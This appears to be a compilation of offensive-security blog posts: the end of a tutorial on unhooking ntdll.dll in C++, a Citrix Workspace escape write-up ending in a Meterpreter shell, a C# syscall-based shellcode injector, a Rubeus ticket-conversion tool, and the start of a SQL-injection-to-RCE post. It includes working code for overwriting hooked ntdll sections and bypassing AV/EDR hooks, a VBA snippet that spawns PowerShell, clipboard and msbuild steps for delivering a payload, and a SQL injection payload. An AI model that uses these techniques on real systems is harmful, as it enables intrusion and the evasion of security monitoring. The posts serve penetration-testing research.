GetModuleInformation(hCurrentProcess, hNtdllModule, &miModuleInfo, sizeof(miModuleInfo));
LPVOID pHookedNtdllBaseAddress = (LPVOID)miModuleInfo.lpBaseOfDll;

The Dreaded PE Header

Ok, so we have the base address of the loaded ntdll.dll module within our process. But what does that mean exactly? Well, a DLL is a type of Portable Executable, along with EXEs. This means it is an executable file, and as such it contains a variety of headers and sections of different types that let the operating system know how to load and execute it. The PE header is notoriously dense and complex, as the link above shows, but I’ve found that seeing a working example in action that utilizes only parts of it makes it much easier to comprehend. Oh and pictures don’t hurt either. There are many out there with varying levels of detail, but here is a good one from Wikipedia that has enough detail without being too overwhelming:

PE Header

You can see the legacy of Windows is present at the very beginning of the PE, in the DOS header. It’s always there, but in modern times it doesn’t serve much purpose. We will get its address, however, to serve as an offset to get the actual PE header:

PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)pHookedNtdllBaseAddress;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)pHookedNtdllBaseAddress + hookedDosHeader->e_lfanew);

Here the e_lfanew field of the hookedDosHeader struct contains an offset into the memory of the module identifying where the PE header actually begins, which is the COFF header in the diagram above.

Now that we are at the beginning of the PE header, we can begin parsing it to find what we’re looking for. But let’s step back for a second and identify exactly what we are looking for so we know when we’ve found it.

Every executable/PE has a number of sections. These sections represent various types of data and code within the program, such as actual executable code, resources, images, icons, etc. These types of data are split into different labeled sections within the executable, named things like .text, .data, .rdata and .rsrc. The .text section, sometimes called the .code section, is what we are after, as it contains the assembly language instructions that make up ntdll.dll.

So how do we access these sections? In the diagram above, we see there is a section table, which contains an array of pointers to the beginning of each section. Perfect for iterating through and finding each section. This is how we will find our .text section: with a for loop that counts from 0 up to the hookedNtHeader->FileHeader.NumberOfSections field:

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++)
{
    // loop through each section offset
}

From here on out, don’t forget we will be inside this loop, looking for the .text section. To identify it, we use our loop counter i as an index into the section table itself, and get a pointer to the section header:

PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

The section header for each section contains the name of that section. So we can look at each one and see if it matches .text:

if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text"))
    // process the header

We found the .text section! The header for it anyway. What we need now is to know the size and location of the actual code within the section. The section header has us covered for both:

LPVOID hookedVirtualAddressStart = (LPVOID)((DWORD_PTR)pHookedNtdllBaseAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);
SIZE_T hookedVirtualAddressSize = hookedSectionHeader->Misc.VirtualSize;

We now have everything we need to overwrite the .text section of the loaded and hooked ntdll.dll module with our clean ntdll.dll on disk:

  • The source to copy from (our memory-mapped file ntdll.dll on disk)
  • The destination to copy to (the .text section at hookedVirtualAddressStart, derived from hookedSectionHeader->VirtualAddress)
  • The number of bytes to copy (hookedSectionHeader->Misc.VirtualSize bytes)

Saving the Output

At this point, we save the entire contents of the .text section so we can examine it and compare it to the clean version and know that unhooking was successful:

char* hookedBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(hookedBytes, hookedVirtualAddressSize, hookedVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(hookedBytes, "hooked.txt", hookedVirtualAddressSize);

This simply makes a copy of the hooked .text section and calls the saveBytes function, which writes the bytes to a text file named hooked.txt. We’ll examine this file a little later on.

Memory Management

In order to overwrite the contents of the .text section, we need to save the current memory protection and change it to Read/Write/Execute. We’ll change it back once we’re done:

DWORD oldProtection = 0;
BOOL isProtected;
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, PAGE_EXECUTE_READWRITE, &oldProtection);
// overwrite the .text section here
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, oldProtection, &oldProtection);

Home Stretch

We’re finally at the final phase. We start by getting the address of the beginning of the memory-mapped ntdll.dll to use as our copy source:

LPVOID cleanVirtualAddressStart = (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);

Let’s save these bytes as well, so we can compare them later:

char* cleanBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(cleanBytes, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(cleanBytes, "clean.txt", hookedVirtualAddressSize);

Now we can overwrite the .text section with the unhooked copy of ntdll.dll:

memcpy_s(hookedVirtualAddressStart, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);

That’s it! All this work for one measly line…

Checking Our Work

So how do we know we actually removed hooks and didn’t just move a bunch of bytes around? Let’s check our output files, hooked.txt and clean.txt. Here we compare them using VBinDiff. This first example is from running the program on a test machine with no AV/EDR product installed, and as expected, the loaded ntdll and the one on disk are identical:

No AV

So let’s run it again, this time on a machine with Avast Free Antivirus running, which uses hooks:

Running

With AV 1

Here we see hooked.txt on top and clean.txt on the bottom, and there are clear differences highlighted in red. We can take these raw bytes, which actually represent assembly instructions, and convert them to their assembly representation with an online disassembler.

Here is the disassembly of the clean ntdll.dll:

mov    QWORD PTR [rsp+0x20],r9
mov    QWORD PTR [rsp+0x10],rdx 

And here is the hooked version:

jmp    0xffffffffc005b978
int3
int3
int3
int3
int3 

A clear jump! This means that something has definitely changed in ntdll.dll when it is loaded into our process.

But how do we know it’s actually hooking a function call? Let’s see if we can find out a little more. Here is another example diff between the hooked DLL on top and the clean one on the bottom:

With AV 1

First the clean DLL:

mov    r10,rcx
mov    eax,0x37 
mov    r10,rcx
mov    eax,0x3a

And the hooked DLL:

jmp    0xffffffffbffe5318
int3
int3
int3
jmp    0xffffffffbffe4cb8
int3
int3
int3 

Ok, so we see some more jumps. But what do those mov eax, <number> instructions mean? Those are syscall numbers! If you read my previous post, I went over how and why to find exactly these in assembly. The idea is to use the syscall number to directly invoke the underlying function in order to avoid… hooks! But what if you want to run code you haven’t written? How do you prevent those hooks from catching that code you can’t change? If you’ve made it this far, you already know!

So let’s use Mateusz “j00ru” Jurczyk’s handy Windows system call table and match up the syscall numbers with their corresponding function calls.

What do we find? 0x37 is NtOpenSection, and 0x3a is NtWriteVirtualMemory! Avast was clearly hooking these function calls. And we know that we have overwritten them with our clean DLL. Success!

Conclusion

Thanks again to spotless and his code that made this post possible. I hope it has been helpful and that the comments and documentation I’ve added help others learn more easily about hooking and the PE header.

Escaping Citrix Workspace and Getting Shells

10 June 2020 at 13:20

Escaping Citrix Workspace and Getting Shells

Background

On a recent web application penetration test I performed, the scoped application was a thick-client .NET application that was accessed via Citrix Workspace. I was able to escape the Citrix environment in two different ways and get a shell on the underlying system. From there I was able to evade two common AV/EDR products and get a Meterpreter shell by leveraging GreatSCT and the “living off the land” binary msbuild.exe. I have of course obfuscated any identifying names/URLs/IPs etc.

What is Citrix Workspace?

Citrix makes a lot of different software products, and in this case I was dealing with Workspace. So what is Citrix Workspace exactly? Here’s what the company says it is:

To realize the agility of cloud without complexity and security slowing you down, you need the flexibility and control of digital workspaces. Citrix Workspace integrates diverse technologies, platforms, devices, and clouds, so it’s flexible and easy to deploy. Adopt new technology without disrupting your existing infrastructure. IT and users can co-create a context-aware, software-defined perimeter that protects and proactively addresses security threats across today’s distributed, multi-device, hybrid- and multi-cloud environments. Unified, contextual, and secure, Citrix is building the workspace of the future so you can operationalize the technology you need to drive business forward.

With the marketing buzzwords out of the way, Workspace is essentially a network-accessible application virtualization platform. Think of it like Remote Desktop, but instead of accessing the entire desktop of a machine, it only presents specific desktop applications. Like the .NET app I was testing, or Office products like Excel. These applications are made available via a web dashboard, which is why it was in scope for the application test I was performing.

Prior Work on Exploiting Citrix

Citrix escapes are nothing new, and there is an excellent and comprehensive blog post on the subject by Pentest Partners. This was my starting point when I discovered I was facing Citrix. It’s absolutely worth a read if you find yourself working with Citrix, and the two exploit ideas I leveraged came from there.

Escape 1: Excel/VBA

Upon authenticating to the application, this is the dashboard I saw.

Citrix dashboard

The blue “E” is the thick-client app, and you can see that Excel is installed as well. The first step is to click on the Excel icon and open a .ICA (Independent Computing Architecture) file. This is similar to an RDP file, and is opened locally with Citrix Connection Manager. Once the .ica file loads, we are presented with a remote instance of Excel streamed over the network to our desktop. Time to see if VBA is accessible.

Excel VBA

Pressing Alt + F11 in Excel will open the VBA editor, which we see open here. I click on the default empty sheet named Sheet1, and I’m presented with a VBA editor console:

Excel VBA editor

Now let’s get a shell! A quick Duck Duck Go search and we have a VB one-liner to run Powershell:

Sub X()
    Shell "CMD /K %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe", vbNormalFocus
End Sub

VBA payload

Press F5 to execute the code:

first shell

Shell yeah! We have a Powershell instance on the remote machine. Note that I initially tried cmd.exe, which was blocked by the Citrix configuration.

Escape 2: Local file creation/Powershell ISE

The second escape I discovered was a little more involved, and made use of Save As dialogs to navigate the underlying file system and create Powershell script file. I started by opening the .NET thick-client application, shown here on the web dashboard with a blue “E”:

E dashboard

We click on it, open the .ICA file as before, and are presented with the application, running on a remote machine and presented to us locally over the network.

E opened

I start by clicking on the Manuals tab and opening a manual PDF with Adobe Reader:

E manual

Adobe manual

As discussed in the Pentest Partners post, I look at the Save As dialog and see if I can enumerate the file system:

save as

I can tell from the path in the dialog box that we are looking at a non-local file system, which is good news. Let’s open a different folder in a new window so we can browse around a bit and maybe create files of our own:

save as

Here I open Custom Office Templates in a new Explorer window, and create a new text document. I enter a Powershell command, Get-Process, and save it as a .ps1 file:

new file

Once the Powershell file is created, I leverage the fact that Powershell files are usually edited with Powershell ISE, or Integrated Scripting Environment. This just so happens to have a built-in Powershell instance for testing code as you write it. Let’s edit it and see what it opens with:

edit ps1 ISE

Shell yeah! We have another shell.

Getting C2, and a copy pasta problem

Once I gained a shell on the underlying box, I started doing some enumeration and discovered that outbound HTTP traffic was being filtered, presumably by an enterprise web proxy. So downloading tools or implants directly was out of the question, and not good OPSEC either. However, many C2 frameworks use HTTP for communication, so I needed to try something that worked over TCP, like Meterpreter. But how to get a payload on the box? HTTP was out, and dragging and dropping files does not work, just as it wouldn’t over RDP normally. But Citrix provides us a handy feature: a shared clipboard.

Here’s the gist: create a payload in a text format or a Base64 encoded binary and use the Powershell cmdlet Set-Clipboard to copy it into our local clipboard. Then on the remote box, save the contents of the clipboard to a file with Get-Clipboard > file. I wanted to avoid dropping a binary Meterpreter payload, so I opted for GreatSCT. This is a slick tool that lets you embed a Meterpreter payload within an XML file that can be parsed and run via msbuild.exe. MSbuild is a so-called “living off the land” binary, a Microsoft-signed executable that already exists on the box. It’s used by Visual Studio to perform build actions, as defined by an XML file or C# project file. Let’s see how it went.

I started by downloading GreatSCT on Kali Linux and creating an msbuild/meterpreter/rev_tcp payload:

GreatSCT

Here’s what the resulting XML payload looks like:

payload.xml

As I mentioned above, I copy the contents of the payload.xml file into the shared clipboard:

payload.xml

Then on the victim machine I copy it from the clipboard to the local file system:

payload.xml

I then start a MSF handler and execute the payload with msbuild.exe:

payload.xml

payload.xml

Shell yeah! We have a Meterpreter session, and the AV/EDR products haven’t given us any trouble.

Conclusions

There were a couple things I took away from this engagement, mostly revolving around the difficulty of providing partial access to Windows.

  • Locking down Windows is hard, so locking down Citrix is hard.

Citrix has security features designed to prevent access to the underlying operating system, but they inherently involve providing access to Windows applications while trying to prevent all the little ways of getting shells, accessing the file system, and exploiting application functionality. Reducing the attack surface of Windows is difficult, and by permitting partial access to the OS via Citrix, you inherit all of that attack surface.

  • Don’t allow access to dangerous features.

This application could have prevented the escapes I used by not allowing Excel’s VBA feature and blocking access to powershell.exe, as was done with cmd.exe. However I was informed that both features were vital to the operation of the .NET application. Without some very careful re-engineering of the application itself, application whitelisting, and various other hardening techniques, none of which are guaranteed to be 100% effective, it is very hard or impossible to present VB and Powershell functionality without allowing inadvertent shell access.

Using Syscalls to Inject Shellcode on Windows

1 June 2020 at 15:20

Using Syscalls to Inject Shellcode on Windows

After learning how to write shellcode injectors in C via the Sektor7 Malware Development Essentials course, I wanted to learn how to do the same thing in C#. Writing a simple injector that is similar to the Sektor7 one, using P/Invoke to run similar Win32 API calls, turns out to be pretty easy. The biggest difference I noticed was that there was not a directly equivalent way to obfuscate API calls. After some research and some questions on the BloodHound Slack channel (thanks @TheWover and @NotoriousRebel!), I found there are two main options I could look into: native Windows system calls (AKA syscalls), or Dynamic Invocation. Each has its pros and cons, and in this case the biggest pro for syscalls was the excellent work explaining and demonstrating them by Jack Halon (here and here) and badBounty. Most of this post and POC is drawn from their fantastic work on the subject. I know TheWover and Ruben Boonen are doing some work on D/Invoke, and I plan on digging into that next.

I want to mention that a main goal of this post is to serve as documentation for this proof of concept and to clarify my own understanding. So while I’ve done my best to ensure the information here is accurate, it’s not guaranteed to be 100%. But hey, at least the code works.

Said working code is available here

Native APIs and Win32 APIs

To begin, I want to cover why we would want to use syscalls in the first place. The answer is API hooking, performed by AV/EDR products. This is a technique defensive products use to inspect Win32 API calls before they are executed, determine if they are suspicious/malicious, and either block or allow the call to proceed. This is done by slightly changing the assembly of commonly abused API calls to jump to AV/EDR controlled code, where the call is then inspected, and assuming it is allowed, jumping back to the code of the original API call. For example, the CreateThread and CreateRemoteThread Win32 APIs are often used when injecting shellcode into a local or remote process. In fact I will use CreateThread shortly in a demo of injection using strictly Win32 APIs. These APIs are defined in Windows DLL files, in this case MSDN tells us in Kernel32.dll. These are user-mode DLLs, which means they are accessible to running user applications, and they do not actually interact directly with the operating system or CPU. Win32 APIs are essentially a layer of abstraction over the Windows native API. This API is considered kernel-mode, in that these APIs are closer to the operating system and underlying hardware. There are technically lower levels than this that actually perform kernel-mode functionality, but these are not exposed directly. The native API is the lowest level that is still exposed and accessible by user applications, and it functions as a kind of bridge or glue layer between user code and the operating system. Here’s a good diagram of how it looks:

Windows Architecture

You can see how Kernel32.dll, despite the misleading name, sits at a higher level than ntdll.dll, which is right at the boundary between user-mode and kernel-mode.

So why does the Win32 API exist? A big reason is to call native APIs. When you call a Win32 API, it in turn calls a native API function, which then crosses the boundary into kernel-mode. User-mode code never directly touches hardware or the operating system; the way it accesses lower-level functionality is through native APIs. But if the native APIs still have to call yet lower-level APIs, why not go straight to native APIs and cut out an extra step? One answer is so that Microsoft can make changes to the native APIs without affecting user-mode application code. In fact, the specific functions in the native API often do change between Windows versions, yet the changes don’t affect user-mode code because the Win32 APIs remain the same.

So why do all these layers and levels and APIs matter to us if we just want to inject some shellcode? The main difference for our purposes between Win32 APIs and native APIs is that AV/EDR products can hook Win32 calls, but not native ones. This is because native calls are considered kernel-mode, and user code can’t make changes to it. There are some exceptions to this, like drivers, but they aren’t applicable for this post. The big takeaway is defenders can’t hook native API calls, while we are still allowed to call them ourselves. This way we can achieve the same functionality without the same visibility by defensive products. This is the fundamental value of system calls.

System Calls

Another name for native API calls is system calls. Similar to Linux, each system call has a specific number that represents it. This number is an index into the System Service Dispatch Table (SSDT), a table in the kernel that holds references to various kernel-level functions. Each named native API has a matching syscall number, which has a corresponding SSDT entry. In order to make use of a syscall, it’s not enough to know the name of the API, such as NtCreateThread. We have to know its syscall number as well. We also need to know which version of Windows our code will run on, as the syscall numbers can and likely will change between versions. There are two ways to find these numbers: one easy, and one involving the dreaded debugger.

The first and easiest way is to use the handy Windows system call table created by Mateusz “j00ru” Jurczyk. This makes it dead simple to find the syscall number you’re looking for, assuming you already know which API you’re after (more on that later).

WinDbg

The second method of finding syscall numbers is to look them up directly at the source: ntdll.dll. The first syscall we need for our injector is NtAllocateVirtualMemory. So we can fire up WinDbg and look for the NtAllocateVirtualMemory function in ntdll.dll. This is much easier than it sounds. First I open a target process to debug. It doesn’t matter which process, as basically all processes will map ntdll.dll. In this case I used good old notepad.

Opening Notepad in WinDbg

We attach to the notepad process and in the command prompt enter x ntdll!NtAllocateVirtualMemory. This lets us examine the NtAllocateVirtualMemory function within the ntdll.dll DLL. It returns a memory location for the function, which we examine, or unassemble, with the u command:

NtAllocateVirtualMemory Unassembled

Now we can see the exact assembly language instructions for calling NtAllocateVirtualMemory. Calling syscalls in assembly tends to follow a pattern: some arguments are set up in registers, seen with the mov r10,rcx statement, followed by moving the syscall number into the eax register, shown here as mov eax,18h. eax is the register the syscall instruction uses for every syscall. So now we know the syscall number of NtAllocateVirtualMemory is 18 in hex, which happens to be the same value listed in Mateusz’s table! So far so good. We repeat this two more times, once for NtCreateThreadEx and once for NtWaitForSingleObject.
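That mov eax,&lt;imm32&gt; pattern is consistent enough that you can pull the syscall number straight out of a stub’s bytes. Here’s a minimal Python sketch of the idea (my own helper, not from the post’s code); the stub bytes are the ones unassembled above, and the offsets assume the common x64 prologue, which can differ on other builds:

```python
def syscall_number(stub: bytes) -> int:
    """Extract the syscall number from a typical x64 ntdll function stub."""
    # Typical prologue: mov r10, rcx -> 4c 8b d1
    if stub[:3] != b"\x4c\x8b\xd1":
        raise ValueError("unexpected stub prologue")
    # mov eax, imm32 -> b8 XX XX XX XX; the little-endian imm32 is the syscall number
    if stub[3] != 0xB8:
        raise ValueError("expected mov eax, imm32")
    return int.from_bytes(stub[4:8], "little")

# Bytes of ntdll!NtAllocateVirtualMemory as unassembled in WinDbg above
print(hex(syscall_number(bytes.fromhex("4c8bd1b818000000"))))  # 0x18
```

This is essentially what tooling like SysWhispers automates across many stubs at once.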

Finding the syscall number for NtCreateThreadEx Finding the syscall number for NtWaitForSingleObject

Where are you getting these native functions?

So far the process of finding the syscall numbers for our native API calls has been pretty easy. But there’s a key piece of information I’ve left out thus far: how do I know which syscalls I need? The way I did this was to take a basic functioning shellcode injector in C# that uses Win32 API calls (named Win32Injector, included in the Github repository for this post) and found the corresponding syscalls for each Win32 API call. Here is the code for Win32Injector:

Win32Injector

This is a barebones shellcode injector that executes some shellcode to display a popup box:

Hello world from Win32Injector

As you can see from the code, the three main Win32 API calls used via P/Invoke are VirtualAlloc, CreateThread, and WaitForSingleObject, which allocate memory for our shellcode, create a thread that points to our shellcode, and wait on that thread, respectively. As these are normal Win32 APIs, they each have comprehensive documentation on MSDN. But as native APIs are considered undocumented, we may have to look elsewhere. There is no one source of truth for API documentation that I could find, but with some searching I was able to find everything I needed.

In the case of VirtualAlloc, some simple searching showed that the underlying native API was NtAllocateVirtualMemory, which was in fact documented on MSDN. One down, two to go.

Unfortunately, there was no MSDN documentation for NtCreateThreadEx, which is the native API for CreateThread. Luckily, badBounty’s directInjectorPOC has the function definition available, and already in C# as well. This project was a huge help, so kudos to badBounty!

Lastly, I needed to find documentation for NtWaitForSingleObject, which as you might guess, is the native API called by WaitForSingleObject. You’ll notice a theme where many native API calls are prefaced with “Nt”, which makes mapping them from Win32 calls easier. You may also see the prefix “Zw”, which is also a native API call, but normally called from the kernel. These are sometimes identical, which you will see if you do x ntdll!ZwWaitForSingleObject and x ntdll!NtWaitForSingleObject in WinDbg. Again we get lucky with this API, as ZwWaitForSingleObject is documented on MSDN.

I want to point out a few other good sources of information for mapping Win32 to native API calls. First is the source code for ReactOS, which is an open source reimplementation of Windows. The Github mirror of their codebase has lots of syscalls you can search for. Next is SysWhispers, by jthuraisamy. It’s a project designed to help you find and implement syscalls. Really good stuff here. Lastly, the tool API Monitor. You can run a process and watch what APIs are called, their arguments, and a whole lot more. I didn’t use this a ton, as I only needed 3 syscalls and it was faster to find existing documentation, but I can see how useful this tool would be in larger projects. I believe ProcMon from Sysinternals has similar functionality, but I didn’t test it out much.

Ok, so we have our Win32 APIs mapped to our syscalls. Let’s write some C#!

But these docs are all for C/C++! And isn’t that assembly over there…

Wait a minute, these docs all have C/C++ implementations. How do we translate them into C#? The answer is marshaling. This is the essence of what P/Invoke does. Marshaling is a way of making use of unmanaged code, e.g. C/C++, and using it in a managed context, that is, in C#. This is easily done for Win32 APIs via P/Invoke. Just import the DLL, specify the function definition with the help of pinvoke.net, and you’re off to the races. You can see this in the demo code of Win32Injector. But since syscalls are undocumented, Microsoft does not provide such an easy way to interface with them. But it is indeed possible, through the magic of delegates. Jack Halon covers delegates really well here and here, so I won’t go too in depth in this post. I would suggest reading those posts to get a good handle on them, and the process of using syscalls in general. But for completeness, delegates are essentially function pointers, which allow us to pass functions as parameters to other functions. The way we use them here is to define a delegate whose return type and function signature matches that of the syscall we want to use. We use marshaling to make sure the C/C++ data types are compatible with C#, define a function that implements the syscall, including all of its parameters and return type, and there you have it!

Not quite. We can’t actually call a native API, since the only implementation of it we have is in assembly! We know its function definition and parameters, but we can’t actually call it directly the same way we do a Win32 API. The assembly will work just fine for us though. Once again, it’s rather simple to execute assembly in C/C++, but C# is a little harder. Luckily we have a way to do it, and we already have the assembly from our WinDbg adventures. And don’t worry, you don’t really need to know assembly to make use of syscalls. Here is the assembly for the NtAllocateVirtualMemory syscall:

NtAllocateVirtualMemory Assembly

As you can see from the comments, we’re setting up some arguments on the stack, moving our syscall number into the eax register, and using the magic syscall operator. At a low enough level, this is just a function call. And remember how delegates are just function pointers? Hopefully it’s starting to make sense how this is fitting together. We need to get a function pointer that points to this assembly, along with some arguments in a C/C++ compatible format, in order to call a native API.
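The “typed function pointer over raw bytes” idea isn’t unique to C# delegates, and it can be demonstrated in a few lines elsewhere. Below is a hedged Python/ctypes sketch of the same concept (my own illustration, not from the post’s code; POSIX-only and x86-64 assumed, and the stub simply returns 42 rather than making a real Windows syscall):

```python
import ctypes
import mmap

# x86-64 machine code: mov eax, 42 ; ret
code = b"\xb8\x2a\x00\x00\x00\xc3"

# Anonymous RWX mapping -- the same reason the C# code calls VirtualProtectEx:
# the bytes must be executable before a function pointer can run them
buf = mmap.mmap(-1, mmap.PAGESIZE,
                prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
buf.write(code)

# The "delegate": a typed function pointer aimed at the buffer
functype = ctypes.CFUNCTYPE(ctypes.c_int)
addr = ctypes.addressof(ctypes.c_char.from_buffer(buf))
assembled_function = functype(addr)

print(assembled_function())  # 42
```

Calling assembled_function() executes the raw bytes as a function, exactly the role Marshal.GetDelegateForFunctionPointer plays in the C# version.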

Putting it all together

So we’re almost done now. We have our syscalls, their numbers, the assembly to call them, and a way to call them in delegates. Let’s see how it actually looks in C#:

NtAllocateVirtualMemory Code

Starting from the top, we can see the C/C++ definition of NtAllocateVirtualMemory, as well as the assembly for the syscall itself. Starting at line 38, we have the C# definition of NtAllocateVirtualMemory. Note that it can take some trial and error to get each type in C# to match up with the unmanaged type. We create a pointer to our assembly inside an unsafe block. This allows us to perform operations in C#, like operate on raw memory, that are normally not safe in managed code. We also use the fixed keyword to make sure the C# garbage collector does not inadvertently move our memory around and change our pointers. Once we have a raw pointer to the memory location of our shellcode, we need to change its memory protection to executable so it can be run directly, as it will be a function pointer and not just data. Note that I am using the Win32 API VirtualProtectEx to change the memory protection. I’m not aware of a way to do this via syscall, as it’s kind of a chicken and the egg problem of getting the memory executable in order to run a syscall. If anyone knows how to do this in C#, please reach out! Another thing to note here is that setting memory to RWX is generally somewhat suspicious, but as this is a POC, I’m not too worried about that at this point. We’re concerned with hooking right now, not memory scanning!

Now comes the magic. This is the struct where our delegates are declared:

Delegates Struct

Note that a delegate definition is just a function signature and return type. The implementation is up to us, as long as it matches the delegate definition, and it’s what we’re implementing here in the C# NtAllocateVirtualMemory function. At line 65 above, we create a delegate named assembledFunction, which takes advantage of the special marshaling function Marshal.GetDelegateForFunctionPointer. This method allows us to get a delegate from a function pointer. In this case, our function pointer is the pointer to the syscall assembly called memoryAddress. assembledFunction is now a function pointer to an assembly language function, which means we’re now able to execute our syscall! We can call the assembledFunction delegate like any normal function, complete with arguments, and we will get the results of the NtAllocateVirtualMemory syscall. So in our return statement we call assembledFunction with the arguments that were passed in and return the result. Let’s look at where we actually call this function in Program.cs:

Calling NtAllocateMemory

Here you can see we make a call to NtAllocateVirtualMemory instead of the Win32 API VirtualAlloc that Win32Injector uses. We set up the function call with all the needed arguments (lines 43-48) and make the call to NtAllocateVirtualMemory. This returns a block of memory for our shellcode, just like VirtualAlloc would!

The remaining steps are similar:

Remaining Syscalls

We copy our shellcode into our newly-allocated memory, and then create a thread within our current process pointing to that memory via another syscall, NtCreateThreadEx, in place of CreateThread. Finally, we wait on the thread with a call to the syscall NtWaitForSingleObject, instead of WaitForSingleObject. Here’s the final result:

Hello World Shellcode

Hello world via syscall! Assuming this was some sort of payload running on a system with API hooking enabled, we would have bypassed it and successfully run our payload.

A note on native code

Some key parts of this puzzle I’ve not mentioned yet are all of the native structs, enumerations, and definitions needed for the syscalls to function properly. If you look at the screenshots above, you will see types that don’t have implementations in C#, like the NTSTATUS return type for all the syscalls, or the AllocationType and ACCESS_MASK bitmasks. These types are normally declared in various Windows headers and DLLs, but to use syscalls we need to implement them ourselves. The process I followed to find them was to look for any non-simple type and try to find a definition for it. Pinvoke.net was massively helpful for this task. Between it and other resources like MSDN and the ReactOS source code, I was able to find and add everything I needed. You can find that code in the Native.cs class of the solution here.

Wrapup

Syscalls are fun! It’s not every day you get to combine 3 different languages, managed and unmanaged code, and several levels of Windows APIs in one small program. That said, there are some clear difficulties with syscalls. They require a fair bit of boilerplate code to use, and that boilerplate is scattered all around for you to find like a little undocumented treasure hunt. Debugging can also be tricky with the transition between managed and unmanaged code. Finally, syscall numbers change frequently and have to be customized for the platform you’re targeting. D/Invoke seems to handle several of these issues rather elegantly, so I’m excited to dig into those more soon.

Rubeus to Ccache

17 May 2020 at 15:20

Rubeus to Ccache

I wrote a new little tool called RubeusToCcache recently to handle a use case I come across often: converting the Rubeus output of Base64-encoded Kerberos tickets into .ccache files for use with Impacket.

Background

If you’ve done any network penetration testing, red teaming, or Hack The Box/CTFs, you’ve probably come across Rubeus. It’s a fantastic tool for all things Kerberos, especially when it comes to tickets and Pass The Ticket/Overpass The Hash attacks. One of the most commonly used features of Rubeus is the ability to request/dump TGTs and use them in different contexts in Rubeus or with other tools. Normally Rubeus outputs the tickets in Base64-encoded .kirbi format, .kirbi being the file type commonly used by Mimikatz. The Base64 encoding makes it very easy to copy and paste and generally make use of the TGT in different ways.

You can also use acquired tickets with another excellent toolset, Impacket. Many of the Impacket tools can use Kerberos authentication via a TGT, which is incredibly useful in a lot of different contexts, such as pivoting through a compromised host so you can Stay Off the Land. Only one problem: Impacket tools use the .ccache file format to represent Kerberos tickets. Not to worry though, because Zer1t0 wrote ticket_converter.py (included with Impacket), which allows you to convert .kirbi files directly into .ccache files. Problem solved, right?

Rubeus To Ccache

Mostly solved, because there’s still the fact that Rubeus spits out .kirbi files Base64-encoded. Is it hard or time-consuming to do a simple little [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64RubeusTGT)) to get a .kirbi and then use ticket_converter.py? Not at all, but it’s still an extra step that gets repeated over and over, making it ripe for a little automation. Hence Rubeus to Ccache.
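In Python the same manual step looks like this. One caveat worth noting: the blob should be decoded to raw bytes rather than a UTF-8 string, since .kirbi is binary ASN.1. The base64_blob below is a stand-in for real Rubeus output:

```python
import base64

# Stand-in for the Base64 blob copied out of Rubeus
base64_blob = base64.b64encode(b"\x76\x82\x01\x00 demo kirbi bytes").decode()

# Decode to raw bytes and write a .kirbi ready for ticket_converter.py
kirbi_bytes = base64.b64decode(base64_blob)
with open("ticket.kirbi", "wb") as f:
    f.write(kirbi_bytes)
```

From there, ticket_converter.py turns ticket.kirbi into a .ccache, which is the step Rubeus to Ccache folds into one command.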

You pass it the Base64-encoded blob Rubeus gives you, along with a file name for a .kirbi file and a .ccache file, and you get a fresh ticket in both formats, ready for Impacket. To use the .ccache file, make sure to set the appropriate environment variable: export KRB5CCNAME=shiny_new_ticket.ccache. Then you can use most Impacket tools like this: wmiexec.py domain/[email protected] -k -no-pass, where the -k flag indicates the use of Kerberos tickets for authentication.

Usage

╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐  ┌┬┐┌─┐  ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐   │ │ │  ║  │  ├─┤│  ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘   ┴ └─┘  ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
              By Solomon Sklash
          github.com/SolomonSklash
   Inspired by Zer1t0's ticket_converter.py

usage: rubeustoccache.py [-h] base64_input kirbi ccache

positional arguments:
  base64_input  The Base64-encoded .kirbi, such as from Rubeus.
  kirbi         The name of the output file for the decoded .kirbi file.
  ccache        The name of the output file for the ccache file.

optional arguments:
  -h, --help    show this help message and exit

Thanks

Thanks to Zer1t0 and the Impacket project for doing most of the heavy lifting.

From SQL to RCE: Exploiting SessionState Deserialization Against ASP.NET Web Applications

20 April 2020 at 16:00

Today I want to talk about an interesting find from a penetration test last year. It was an ordinary, uneventful afternoon of routine testing, trying every possible injection on every parameter without any progress or breakthrough, until on one page I injected ?id=1; waitfor delay '00:00:05'-- and it hung, with the server responding after exactly 5 seconds. That meant we had found a SQL injection against SQL Server!

In some aging, sprawling systems, for various convoluted reasons, the sa account is often still used to log in to SQL Server. With a database account of that privilege level, we could easily use xp_cmdshell to execute system commands and take control of the database server’s operating system. But if the story went that smoothly, this article wouldn’t exist, so naturally the database account we obtained did not have sufficient privileges. Still, because the SQL injection we found was stacked-based, we could perform CRUD operations on tables, and with some luck at controlling site configuration values we might even achieve RCE directly. So we dumped the schema to understand the layout, and during the dump we found an interesting database:

Database: ASPState
[2 tables]
+---------------------------------------+
| dbo.ASPStateTempApplications          |
| dbo.ASPStateTempSessions              |
+---------------------------------------+

